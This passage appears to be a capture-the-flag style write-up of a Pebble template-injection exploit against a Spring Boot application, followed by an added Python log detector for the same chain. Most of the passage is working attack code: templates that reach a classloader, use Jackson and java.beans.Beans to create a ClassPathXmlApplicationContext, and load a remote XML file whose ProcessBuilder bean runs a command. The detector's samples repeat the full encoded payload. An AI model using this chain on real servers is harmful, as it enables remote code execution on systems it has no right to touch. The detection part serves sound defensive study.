After that it was also a matter of luck: after testing the first few candidates, I found that by grabbing the internalCachingMetadataReaderFactory object I could get hold of the classLoader.
So with this we can load any class we like:

```twig
{% set class1 = beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("xxxx") %}
```
But we need an instance of the class, and we can't call any of its methods, since what we hold is only a Class object. The nice thing is that Jackson is available here, and the beans object can fetch it directly, which solves everything:

```twig
{% set woshishuaibi = beans.get("jacksonObjectMapper").readValue("{}", class1) %}
```
So once we can obtain an instance of a class, RCE becomes relatively "simple", for example:

```java
ScriptEngineManager engineManager = new ScriptEngineManager();
ScriptEngine engine = engineManager.getEngineByName("js");
engine.eval("xxxx");
```
But the challenge environment is JDK 18, and engineManager.getEngineByName turned out to have absolutely nothing left in it, so this approach is useless too. At the same time, because of Jackson's instantiation restrictions, we can't directly instantiate JShell either.
At this point I had a flash of inspiration and remembered two classes whose instantiation plus config-file loading can lead to RCE:
- org.springframework.context.support.ClassPathXmlApplicationContext
- org.springframework.context.support.FileSystemXmlApplicationContext
Both fall under AbstractPointcutAdvisor/AbstractApplicationContext, and neither works. Ugh.
So what now? Is there some class on the classpath that could help us instantiate arbitrary objects?
An alternative way around the Jackson blacklist: of course there is! It's the java.beans.Beans class, which can instantiate arbitrary classes for us:
```java
public static Object instantiate(ClassLoader cls, String beanName)
        throws IOException, ClassNotFoundException {
    return Beans.instantiate(cls, beanName, null, null);
}
```
The cls parameter here can be left out: if it is null, the method falls back to ClassLoader.getSystemClassLoader() to obtain a classloader:
```java
public static Object instantiate(ClassLoader cls, String beanName,
                                 BeanContext beanContext,
                                 AppletInitializer initializer)
        throws IOException, ClassNotFoundException {
    InputStream ins;
    ObjectInputStream oins = null;
    Object result = null;
    boolean serialized = false;
    IOException serex = null;

    // If the given classloader is null, we check if an
    // system classloader is available and (if so)
    // use that instead.
    // Note that calls on the system class loader will
    // look in the bootstrap class loader first.
    if (cls == null) {
        try {
            cls = ClassLoader.getSystemClassLoader();
        } catch (SecurityException ex) {
            // We're not allowed to access the system class loader.
            // Drop through.
        }
    }
    // ... (remainder of the method omitted here)
```
For the logic that follows we don't need to care about the secondary deserialization part; further down we can see that it instantiates any public class through its no-argument constructor:

```java
    if (result == null) {
        // No serialized object, try just instantiating the class
        Class<?> cl;
        try {
            cl = ClassFinder.findClass(beanName, cls);
        } catch (ClassNotFoundException ex) {
            // There is no appropriate class.  If we earlier tried to
            // deserialize an object and got an IO exception, throw that,
            // otherwise rethrow the ClassNotFoundException.
            if (serex != null) {
                throw serex;
            }
            throw ex;
        }
        if (!Modifier.isPublic(cl.getModifiers())) {
            throw new ClassNotFoundException("" + cl + " : no public access");
        }
        /*
         * Try to instantiate the class.
         */
        try {
            result = cl.newInstance();
        } catch (Exception ex) {
            // We have to remap the exception to one in our signature.
            // But we pass extra information in the detail message.
            throw new ClassNotFoundException("" + cl + " : " + ex, ex);
        }
    }
```
Final construction to achieve RCE. The final template file:

```twig
{% set y = beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}
{% set yy = beans.get("jacksonObjectMapper").readValue("{}", y) %}
{% set yyy = yy.instantiate(null, "org.springframework.context.support.ClassPathXmlApplicationContext") %}
{{ yyy.setConfigLocation("http://xxxx/1.xml") }}
{{ yyy.refresh() }}
```
1.xml:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>open</value>
                <value>-a</value>
                <value>calculator</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
```
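As an added example (not part of the original write-up and not the challenge's code), here is a small Python request-log detector for the chain just shown: it URL-decodes each line (repeatedly, since template syntax is often double-encoded), looks for Pebble delimiters and for each stage of the chain, and rates the line. The `/greet?name=` endpoint and the log lines are constructed for illustration.

```python
# Added detector for the Pebble SSTI -> beans -> java.beans.Beans -> XmlApplicationContext chain; samples are constructed.
import re
from urllib.parse import unquote_plus

# One regex per stage of the chain; several matches on one request is the signal.
STAGES = {
    "bean_lookup": re.compile(r'beans\.get\(\s*["\']'),
    "classloader": re.compile(r'resourceLoader\.classLoader\.loadClass\('),
    "jackson_newinst": re.compile(r'jacksonObjectMapper["\']\)\.readValue\('),
    "beans_instantiate": re.compile(r'java\.beans\.Beans|\.instantiate\(\s*null\s*,'),
    "xml_context": re.compile(r'(ClassPath|FileSystem)XmlApplicationContext'),
    "remote_config": re.compile(r'setConfigLocation\(\s*["\']\w+://'),
    "refresh": re.compile(r'\.refresh\(\s*\)'),
}

def decode(payload: str, rounds: int = 3) -> str:
    """URL-decode repeatedly: template syntax is often double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(payload)
        if decoded == payload:
            break
        payload = decoded
    return payload

def analyze(line: str) -> dict:
    """Return the matched chain stages and a verdict for one request log line."""
    text = decode(line)
    stages = [name for name, rx in STAGES.items() if rx.search(text)]
    template = "{%" in text or "{{" in text
    if template and len(stages) >= 3:
        verdict = "critical"    # template syntax plus most of the chain
    elif template or stages:
        verdict = "suspicious"  # template probing or a stray stage
    else:
        verdict = "clean"
    return {"stages": stages, "template_syntax": template, "verdict": verdict}

# Constructed samples: benign, a probe, a double-encoded probe, the full chain encoded.
SAMPLE_LOG = [
    "GET /greet?name=alice HTTP/1.1",
    "GET /greet?name={{7*7}} HTTP/1.1",
    "GET /greet?name=%257B%257B7*7%257D%257D HTTP/1.1",
    "GET /greet?name=%7B%25%20set%20y%3D%20beans.get(%22org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory%22)"
    ".resourceLoader.classLoader.loadClass(%22java.beans.Beans%22)%20%25%7D%7B%25%20set%20yy%20%3Dbeans.get(%22jacksonObjectMapper%22)"
    ".readValue(%22%7B%7D%22,%20y)%20%25%7D%7B%25%20set%20yyy%20%3D%20yy.instantiate(null,%22org.springframework.context.support."
    "ClassPathXmlApplicationContext%22)%20%25%7D%7B%7B%20yyy.setConfigLocation(%22http://xxxx/1.xml%22)%20%7D%7D%7B%7B%20yyy.refresh()%20%7D%7D HTTP/1.1",
]

def scan(lines=SAMPLE_LOG):
    return [analyze(line)["verdict"] for line in lines]
```

In a real deployment the same checks belong on the decoded parameter values rather than the raw access-log line, and a hit on `remote_config` is also a good trigger for egress monitoring of the application host.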